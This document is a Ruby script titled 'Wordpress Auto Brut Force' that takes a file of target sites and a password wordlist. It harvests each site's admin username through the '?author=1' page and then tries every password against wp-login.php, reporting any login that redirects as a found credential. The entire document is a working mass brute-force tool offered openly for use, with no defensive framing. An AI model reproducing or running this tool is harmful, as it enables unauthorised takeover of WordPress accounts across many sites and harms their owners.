Wordpress Auto Brut Force

1. #!/user/bin/ruby
2. require 'net/http'
3. require 'net/https'
4. # if site use ssl Del "#" in linge 32
5.  
6. class String
7. def red;            "\033[31m#{self}\033[0m" end
8. def green;          "\033[32m#{self}\033[0m" end
9. def  brown;         "\033[33m#{self}\033[0m" end
10. def cyan;           "\033[36m#{self}\033[0m" end
11. def gray;           "\033[37m#{self}\033[0m" end
12. def blue;           "\033[34m#{self}\033[0m" end
13. def bg_red;         "\033[41m#{self}\033[0m" end
14. def bg_green;       "\033[42m#{self}\033[0m" end
15. def bg_brown;       "\033[43m#{self}\033[0m" end
16. def bg_blue;        "\033[44m#{self}\033[0m" end
17. end
18. class Myfucb
19. def clean()
20. por= RUBY_PLATFORM
21. if(por =~ /linux/)
22.  system("clear")
23. else
24.  system("cls")
25. end
26. end
27. def home()
28. print "           [*]=========================================[*]\n".brown
29. print "           [*]      Wordpress Auto   Brut Force        [*]\n".brown
30. print "           [*]    W  W W . S E C 4 E V E R . c 0 m     [*]\n".brown
31. print "           [*]       H A M Z A    K I L L E R          [*]\n".brown
32. print "           [*]       Hlyzidi[at]gmail[dot]com          [*]\n".brown
33. print "           [*]=========================================[*]\n\n\n".brown
34. end
35.  
36. def brut(urls,user,pwds)
37. userz=user.chomp
38. pwd=pwds.chomp
39. ur=URI.parse(urls)
40. pop=ur.host
41. dd=ur.path
42. http = Net::HTTP.new(pop, 80)
43. #http.use_ssl = true
44. path = "#{dd}/wp-login.php"
45. ip="http://#{pop}#{dd}/wp-admin"
46. resp, data = http.get(path, nil)
47. cookie = resp.response['set-cookie']
48. posts="log=#{userz}&pwd=#{pwd}&rememberme=forever&wp-submit=Log In&redirect_to=#{ip}&testcookie=1"
49. mps= {'Cookie' => cookie,'Content-Type' => 'application/x-www-form-urlencoded'}
50. resp, data  = http.post(path, posts, mps)
51.  
52. iz="http://#{pop}#{dd}"
53. if resp.code == "302"
54. print"[+] #{iz} \n".green
55. print"[+] Found : #{userz} => #{pwd}\n".bg_green
56. exit
57. else
58. print"[-] Error : #{userz} =>";print"#{pwd}\r".bg_red
59. end
60. end
61. def adminame(url)
62. ur=URI.parse(url)
63. pop=ur.host
64. dd=ur.path
65. path="#{dd}?author=1"
66. http = Net::HTTP.new(pop,80)
67. resp, data = http.get(path, nil)
68. dz=resp.body
69. po=dz.scan(/<title>(.*?)<\/title>/i)
70. for dzx in po[0]
71.   #mp=dzx.split('&')
72.  mpx=dzx.split('|')
73.  return mpx[0]
74. end
75. end
76. end
77. p=Myfucb.new
78. p.clean()
79. p.home()
80. print("# Enter Sites File ->".cyan)
81. site=gets.chomp
82. print("# Enter Passwords File ->".cyan)
83. pass=gets.chomp
84. print("# Extect Username Atomatic (y/n)->".cyan)
85. exus=gets.chomp
86. sit=IO.readlines(site)
87. pwd=IO.readlines(pass)
88. p.clean()
89. if exus == "y"
90. p.home()
91. for sites in (sit)
92. user=p.adminame(sites)
93. ur=URI.parse(sites)
94. pop=ur.host
95. dd=ur.path
96. print("http://#{pop}#{dd}\n".bg_blue)
97. print("Username:#{user}\n".green)
98. for passwords in pwd
99. p.brut(sites,user,passwords)
100.  
101. end
102. end
103. elsif exus == "n"
104. p.home()
105. print("# Enter Username ->".cyan)
106. us=gets.chomp
107.  
108. for sites in (sit)
109. ur=URI.parse(sites)
110. pop=ur.host
111. dd=ur.path
112. print("http://#{pop}#{dd}\n".bg_blue)
113. for passwords in pwd
114. p.brut(sites,us,passwords)
115. end
116. end
117. end